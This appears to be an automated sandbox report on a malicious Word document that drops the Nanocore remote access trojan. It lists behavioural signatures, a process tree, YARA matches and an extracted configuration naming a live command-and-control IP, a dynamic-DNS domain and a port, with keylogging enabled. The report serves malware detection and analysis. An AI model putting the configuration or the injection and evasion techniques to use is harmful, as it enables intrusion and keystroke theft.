Play interactive tour

Edit tour

Analysis Report 471e3984_by_Libranalysis

Overview

General Information

Sample Name:	471e3984_by_Libranalysis (renamed file extension from none to docx)
Analysis ID:	402828
MD5:	471e39840386d6b9c8e565123a389364
SHA1:	d9050e2115ee03a7c8e0acc87d199ce0b4b7422a
SHA256:	012300706ce75e6e82abdaa865aa8ff684aef99eda98f9094278b8df84e9642c
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Contains an external reference to another document

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 152 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2904 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2860 cmdline: 'C:\Users\Public\vbc.exe' MD5: 042AA11C6D49E1CCA5923F02D1B0A5AE)

RegSvcs.exe (PID: 3040 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

RegSvcs.exe (PID: 3036 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

RegSvcs.exe (PID: 2988 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x114fb:$a: NanoCore 0x11554:$a: NanoCore 0x11591:$a: NanoCore 0x1160a:$a: NanoCore 0x1a10a:$a: NanoCore 0x1a12f:$a: NanoCore 0x1a188:$a: NanoCore 0x2a333:$a: NanoCore 0x2a359:$a: NanoCore 0x2a3b5:$a: NanoCore 0x37213:$a: NanoCore 0x3726c:$a: NanoCore 0x3729f:$a: NanoCore 0x374cb:$a: NanoCore 0x37547:$a: NanoCore 0x37b60:$a: NanoCore 0x37ca9:$a: NanoCore 0x3817d:$a: NanoCore 0x38464:$a: NanoCore 0x3847b:$a: NanoCore 0x3da21:$a: NanoCore
00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x11d05:$a: NanoCore 0x11d5e:$a: NanoCore 0x11d9b:$a: NanoCore 0x11e14:$a: NanoCore 0x1a8e8:$a: NanoCore 0x1a90d:$a: NanoCore 0x1a966:$a: NanoCore 0x2ab03:$a: NanoCore 0x2ab29:$a: NanoCore 0x2ab85:$a: NanoCore 0x379da:$a: NanoCore 0x37a33:$a: NanoCore 0x37a66:$a: NanoCore 0x37c92:$a: NanoCore 0x37d0e:$a: NanoCore 0x38327:$a: NanoCore 0x38470:$a: NanoCore 0x38944:$a: NanoCore 0x38c2b:$a: NanoCore 0x38c42:$a: NanoCore 0x3e1e0:$a: NanoCore
00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.2388916748.0000000002250000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
00000009.00000002.2388916748.0000000002250000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
00000009.00000002.2388635584.0000000000890000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
00000009.00000002.2388635584.0000000000890000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x29f29d:$x1: NanoCore.ClientPluginHost 0x3242bd:$x1: NanoCore.ClientPluginHost 0x29f2da:$x2: IClientNetworkHost 0x3242fa:$x2: IClientNetworkHost 0x2a2e0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x327e2d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x29f005:$a: NanoCore 0x29f015:$a: NanoCore 0x29f249:$a: NanoCore 0x29f25d:$a: NanoCore 0x29f29d:$a: NanoCore 0x324025:$a: NanoCore 0x324035:$a: NanoCore 0x324269:$a: NanoCore 0x32427d:$a: NanoCore 0x3242bd:$a: NanoCore 0x29f064:$b: ClientPlugin 0x29f266:$b: ClientPlugin 0x29f2a6:$b: ClientPlugin 0x324084:$b: ClientPlugin 0x324286:$b: ClientPlugin 0x3242c6:$b: ClientPlugin 0x29f18b:$c: ProjectData 0x3241ab:$c: ProjectData 0x29fb92:$d: DESCrypto 0x324bb2:$d: DESCrypto 0x2a755e:$e: KeepAlive
Process Memory Space: vbc.exe PID: 2860	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 2988	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x27309:$x1: NanoCore.ClientPluginHost 0x37bf9:$x1: NanoCore.ClientPluginHost 0x56e51:$x1: NanoCore.ClientPluginHost 0x6a53f:$x1: NanoCore.ClientPluginHost 0xbb1cf:$x1: NanoCore.ClientPluginHost 0xbdfb7:$x1: NanoCore.ClientPluginHost 0xc88d3:$x1: NanoCore.ClientPluginHost 0xdb450:$x1: NanoCore.ClientPluginHost 0xdde3a:$x1: NanoCore.ClientPluginHost 0xe128f:$x1: NanoCore.ClientPluginHost 0xe3e7a:$x1: NanoCore.ClientPluginHost 0xeb01e:$x1: NanoCore.ClientPluginHost 0xefe79:$x1: NanoCore.ClientPluginHost 0xfc655:$x1: NanoCore.ClientPluginHost 0x1037a3:$x1: NanoCore.ClientPluginHost 0x1409a3:$x1: NanoCore.ClientPluginHost 0x143770:$x1: NanoCore.ClientPluginHost 0x14e08a:$x1: NanoCore.ClientPluginHost 0x160c05:$x1: NanoCore.ClientPluginHost 0x1635ef:$x1: NanoCore.ClientPluginHost 0x166a44:$x1: NanoCore.ClientPluginHost
Process Memory Space: RegSvcs.exe PID: 2988	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2988	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2729c:$a: NanoCore 0x272cc:$a: NanoCore 0x27309:$a: NanoCore 0x2db3b:$a: NanoCore 0x2db51:$a: NanoCore 0x2db74:$a: NanoCore 0x37bb8:$a: NanoCore 0x37bf9:$a: NanoCore 0x3b04e:$a: NanoCore 0x3b075:$a: NanoCore 0x56e10:$a: NanoCore 0x56e51:$a: NanoCore 0x5d7f6:$a: NanoCore 0x5d81d:$a: NanoCore 0x6a044:$a: NanoCore 0x6a060:$a: NanoCore 0x6a1bb:$a: NanoCore 0x6a1ca:$a: NanoCore 0x6a4a3:$a: NanoCore 0x6a4cf:$a: NanoCore 0x6a53f:$a: NanoCore
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.RegSvcs.exe.3824d52.23.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.3824d52.23.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
9.2.RegSvcs.exe.8a0000.11.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
9.2.RegSvcs.exe.8a0000.11.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
9.2.RegSvcs.exe.3830f84.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d0e:$x1: NanoCore.ClientPluginHost 0x1c25c:$x1: NanoCore.ClientPluginHost 0x2222d:$x1: NanoCore.ClientPluginHost 0x2bc99:$x1: NanoCore.ClientPluginHost 0x360c4:$x1: NanoCore.ClientPluginHost 0x410a1:$x1: NanoCore.ClientPluginHost 0x4ce43:$x1: NanoCore.ClientPluginHost 0x6231b:$x1: NanoCore.ClientPluginHost 0x8a57d:$x1: NanoCore.ClientPluginHost 0x999bd:$x1: NanoCore.ClientPluginHost 0xb1849:$x1: NanoCore.ClientPluginHost 0xd9a97:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d47:$x2: IClientNetworkHost 0x1c295:$x2: IClientNetworkHost 0x2bdf6:$x2: IClientNetworkHost 0x360fd:$x2: IClientNetworkHost 0x410bb:$x2: IClientNetworkHost 0x4ce5d:$x2: IClientNetworkHost 0x62348:$x2: IClientNetworkHost
9.2.RegSvcs.exe.3830f84.24.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.RegSvcs.exe.3830f84.24.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1c25c:$a: NanoCore 0x1c2d6:$a: NanoCore 0x20e73:$a: NanoCore 0x2222d:$a: NanoCore 0x22277:$a: NanoCore 0x22ed1:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
9.2.RegSvcs.exe.3830f84.24.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
9.2.RegSvcs.exe.3830f84.24.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
9.2.RegSvcs.exe.5a0000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.5a0000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
9.2.RegSvcs.exe.750000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
9.2.RegSvcs.exe.750000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
9.2.RegSvcs.exe.5b0000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
9.2.RegSvcs.exe.5b0000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
9.2.RegSvcs.exe.760000.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
9.2.RegSvcs.exe.760000.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
9.2.RegSvcs.exe.9a0000.14.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
9.2.RegSvcs.exe.9a0000.14.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
9.2.RegSvcs.exe.9a0000.14.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.RegSvcs.exe.2280000.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
9.2.RegSvcs.exe.2280000.19.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
6.2.vbc.exe.3b30110.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.vbc.exe.3b30110.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.2.vbc.exe.3b30110.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.vbc.exe.3b30110.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
9.2.RegSvcs.exe.760000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
9.2.RegSvcs.exe.760000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x605:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost
9.2.RegSvcs.exe.9a0000.14.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
9.2.RegSvcs.exe.9a0000.14.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
9.2.RegSvcs.exe.9a0000.14.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.RegSvcs.exe.9a4629.13.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
9.2.RegSvcs.exe.9a4629.13.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
9.2.RegSvcs.exe.9a4629.13.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.RegSvcs.exe.780000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
9.2.RegSvcs.exe.780000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
9.2.RegSvcs.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.RegSvcs.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
9.2.RegSvcs.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.RegSvcs.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
9.2.RegSvcs.exe.5b0000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
